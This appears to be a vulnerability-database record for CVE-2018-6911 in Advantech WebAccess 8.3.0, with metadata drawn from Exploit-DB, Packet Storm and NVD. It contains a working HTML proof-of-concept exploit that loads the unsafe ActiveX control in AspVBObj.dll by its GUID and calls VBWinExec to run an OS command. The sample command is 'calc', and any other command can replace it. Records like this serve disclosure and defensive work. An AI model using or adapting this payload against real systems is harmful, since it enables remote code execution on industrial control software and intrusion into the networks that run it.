ID
VAR-E-201802-0086
CVE
| cve_id: | CVE-2018-6911 | Trust: 1.5 |
EDB ID
44031
TITLE
Advantech WebAccess 8.3.0 - Remote Code Execution - Windows remote Exploit
Trust: 0.6
DESCRIPTION
Advantech WebAccess 8.3.0 - Remote Code Execution. CVE-2018-6911 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | advantech | model: | webaccess | scope: | eq | version: | 8.3.0 | Trust: 1.6 |
| vendor: | advantech | model: | webaccess node | scope: | eq | version: | 8.3.0 | Trust: 0.5 |
EXPLOIT
Vulnerability Title: Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution
Discovered by: Nassim Asrir
Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/
CVE: CVE-2018-6911
Tested on: IE11 / Win10
Technical Details:
==================
The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument.
Vulnerable File: C:\WebAccess\Node\AspVBObj.dll
Vulnerable Function: VBWinExec
Vulnerable Class: Include
Class Include
GUID: {55F52D11-CEA5-4D6C-9912-2C8FA03275CE}
Number of Interfaces: 1
Default Interface: _Include
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
The VBWinExec function take one parameter and the user/attacker will be able to control it to execute OS command.
Function VBWinExec (
ByRef command As String
)
Exploit:
========
<title>Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution</title>
<BODY>
<object id=rce classid="clsid:{55F52D11-CEA5-4D6C-9912-2C8FA03275CE}"></object>
<SCRIPT>
function exploit()
{
rce.VBWinExec("calc")
}
</SCRIPT>
<input language=JavaScript onclick=exploit() type=button value="Exploit-Me"><br>
</body>
</HTML>
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Code Execution
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | code execution | Trust: 0.5 |
CREDITS
Nassim Asrir
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 44031 | Trust: 1.6 |
| db: | NVD | id: | CVE-2018-6911 | Trust: 1.5 |
| db: | EDBNET | id: | 96584 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 146360 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-6911 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/44031/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 146360 |
| db: | EXPLOIT-DB | id: | 44031 |
| db: | EDBNET | id: | 96584 |
LAST UPDATE DATE
2022-07-27T09:15:05.665000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 146360 | date: | 2018-02-12T01:11:11 |
| db: | EXPLOIT-DB | id: | 44031 | date: | 2018-02-13T00:00:00 |
| db: | EDBNET | id: | 96584 | date: | 2018-02-13T00:00:00 |